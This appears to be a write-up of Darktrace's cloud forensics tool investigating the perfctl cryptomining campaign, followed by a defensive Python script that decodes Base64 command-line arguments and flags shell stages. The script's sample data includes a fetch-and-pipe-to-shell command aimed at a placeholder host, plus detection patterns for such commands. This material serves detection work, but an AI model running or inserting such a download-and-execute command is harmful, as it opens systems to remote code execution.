Darktrace’s Forensic Acquisition & Investigation (FAI) is described as an automated cloud-forensic solution that rapidly investigates a compromised cloud server. The data comes from Darktrace’s Cloudypots honeypot network, which observes attacker activity in real time across cloud services.
When a honeypot is compromised, a forensic copy of the virtual server’s disk is preserved, then imported and analysed via FAI to produce attacker timelines and root-cause analysis, all performed cloud-natively without extra configuration. The system imports artifacts from EC2, ECS, S3 and other sources, storing the raw disk image in an S3 bucket for direct import into FAI, with evidence and key event counts visible in the Evidence tab.
In the showcased investigation, alerts were raised on suspicious Base64-encoded arguments passed to Selenium, and analysts pivoted through the timeline to retrieve the full payload, which was decoded with CyberChef to reveal the attacker’s script. The campaign featured a malware variant named perfctl, which downloads a Go binary from a remote host, uses a UPX-packed binary with a hooked header, and can escalate privileges via sudo or CVE-2021-4034, ultimately attempting C2 communication through Tor and launching an XMRig miner. Darktrace notes that Cloudypots observed 1,959 infections of the perfctl campaign across its honeypot network in the past year.
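The triage step described above (spotting Base64-encoded arguments in process command lines, decoding them, and deciding whether the decoded text looks like a shell stage) can be automated ahead of a manual CyberChef pass. The following is an added example written for this page, not Darktrace's FAI code or any part of the perfctl analysis; the command lines, the Base64 token regex and the indicator patterns are constructed assumptions chosen to illustrate the technique, not signatures taken from the campaign.

```python
import base64
import binascii
import re

# Tokens that look like Base64: a long run of the Base64 alphabet with optional
# padding, bounded so that substrings of longer tokens are not picked up.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])([A-Za-z0-9+/]{16,}={0,2})(?![A-Za-z0-9+/=])")

# Indicators (assumed, for illustration) that decoded text is a shell stage
# rather than benign encoded data such as a label or a serialized setting.
SUSPICIOUS_PATTERNS = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),   # download piped into a shell
    re.compile(r"\bchmod\s+\+x\b"),                   # marking a dropped file executable
    re.compile(r"\bnohup\b"),                         # detaching a long-running process
    re.compile(r"\bbase64\s+(-d|--decode)\b"),        # a further layer of encoding
]


def _b64(text):
    """Helper used only to build the constructed sample below."""
    return base64.b64encode(text.encode()).decode()


# Constructed sample: command lines as a forensic tool might recover them from
# a disk image (shell history, process accounting). Not real captured data.
SAMPLE_COMMAND_LINES = [
    "/usr/bin/chromedriver --port=9515 --log-level=INFO",
    # benign: a Selenium job passing an encoded, human-readable label
    f"python3 selenium_runner.py --label {_b64('nightly screenshot job')}",
    # suspicious: an encoded stage that fetches a remote file and pipes it to a shell
    f"sh -c 'echo {_b64('wget -q -O- http://example.invalid/stage | sh')} | base64 -d | sh'",
    "ls -la /var/log",
]


def decode_candidate(token):
    """Return decoded text if token is valid Base64 that yields printable UTF-8, else None."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if not all(ch.isprintable() or ch in "\n\t" for ch in text):
        return None
    return text


def scan_command_line(cmdline):
    """Find Base64-looking tokens in one command line and decode each one.

    Returns a list of dicts with the token, its decoded text and the list of
    indicator patterns that matched the decoded text (empty for benign data).
    """
    findings = []
    for match in B64_TOKEN.finditer(cmdline):
        token = match.group(1)
        decoded = decode_candidate(token)
        if decoded is None:
            continue  # not Base64, or decodes to binary rather than text
        hits = [p.pattern for p in SUSPICIOUS_PATTERNS if p.search(decoded)]
        findings.append({"token": token, "decoded": decoded, "indicators": hits})
    return findings


def triage(command_lines):
    """Return only the findings whose decoded text matched at least one indicator."""
    alerts = []
    for cmdline in command_lines:
        for finding in scan_command_line(cmdline):
            if finding["indicators"]:
                alerts.append({"cmdline": cmdline, **finding})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_COMMAND_LINES):
        print("ALERT:", alert["cmdline"])
        print("  decoded   :", alert["decoded"])
        print("  indicators:", alert["indicators"])
```

Decoding every candidate and reporting even indicator-free results (as `scan_command_line` does) matters in practice: the benign encoded label above is exactly the kind of token that would otherwise be flagged on its shape alone, while the piped-download stage is only recognisable after decoding. The indicator list is a starting point to be tuned against the environment's own baseline of encoded arguments.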